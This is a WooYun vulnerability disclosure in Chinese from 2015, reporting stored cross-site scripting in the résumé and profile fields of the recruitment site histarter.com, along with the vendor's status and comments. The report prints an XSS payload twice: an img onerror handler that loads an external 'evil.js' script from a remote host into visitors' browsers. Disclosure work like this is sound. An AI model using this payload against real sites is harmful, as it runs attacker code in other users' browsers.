当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-089493

漏洞标题:Histart多处未过滤存在 XSS 跨站脚本攻击

相关厂商:histarter.com

漏洞作者: Go7hic

提交时间:2015-01-04 16:05

修复时间:2015-01-09 16:06

公开时间:2015-01-09 16:06

漏洞类型:xss跨站脚本攻击

危害等级:中

自评Rank:10

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-01-04: 细节已通知厂商并且等待厂商处理中
2015-01-09: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

前一个只是简单测试了一下没有通过,但是我估计他们开发的时候真的没有考虑到网站的安全性,整个网站估计都没做什么安全防御,都是我和他们说的两个地方他们才去处理,但是一个网站那么多地方你事后补起来多麻烦,所以作为开发者,我们要一开始就确定好网站的安全架构。
总之,他们这个网站几乎没什么过滤,但是对于一个招聘网站,还带有社交性质,这些 XSS 攻击危害不小。

详细说明:

之前和他们说过修了几个地方,但是还有几处关键的地方没有过滤。
www.histarter.com
一:简历处:

QQ20141231-1.png


QQ20141231-2.png


QQ20141231-3.png


随便写几个 payload 都有效果啊,这个攻击场景应该是别人或猎头进去你的主页,然后点击查看你的简历就会中招,当然我不知道我直接发简历给招聘公司他们收到简历后是什么样,我没试,应该也会有影响。
二:第二个是我的个人主页,右侧有个填我期望的团队特质,此处也咩有做过滤
随便写个 payload 这个页面就挂了

<img src=1 onerror="s=document.createElement('script');s.src='//7sbs9y.com1.z0.glb.clouddn.com/evil.js';document.body.appendChild(s);"


QQ20141231-4.png


这也直接导致别人直接访问你的个人主页会受影响
刚刚写完,发现他们已经修复了第二处,但是简历处还是存在问题。。

漏洞证明:

payload:

<img src=1 onerror="s=document.createElement('script');s.src='//7sbs9y.com1.z0.glb.clouddn.com/evil.js';document.body.appendChild(s);"


QQ20141231-5.png


QQ20141231-6.png


修复方案:

网站安全应该在开发前就像考虑,过滤只是小事,不要到事后再补啊

版权声明:转载请注明来源 Go7hic@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-01-09 16:06

厂商回复:

最新状态:

暂无

漏洞评价:

评论

  1. 2015-01-09 23:40 | Go7hic ( 路人 | Rank:4 漏洞数:4 )

    这尼玛,修完之后就忽略漏洞

  2. 2015-01-12 22:33 | hiStarter(乌云厂商)

    @Go7hic 我没点忽略阿 是自己忽略的

  3. 2015-01-13 14:41 | 肉肉 认证白帽子 ( 普通白帽子 | Rank:112 漏洞数:10 | 肉肉在长亭科技,肉肉在长亭科技,肉肉在长...)

    @hiStarter 5日内认领吧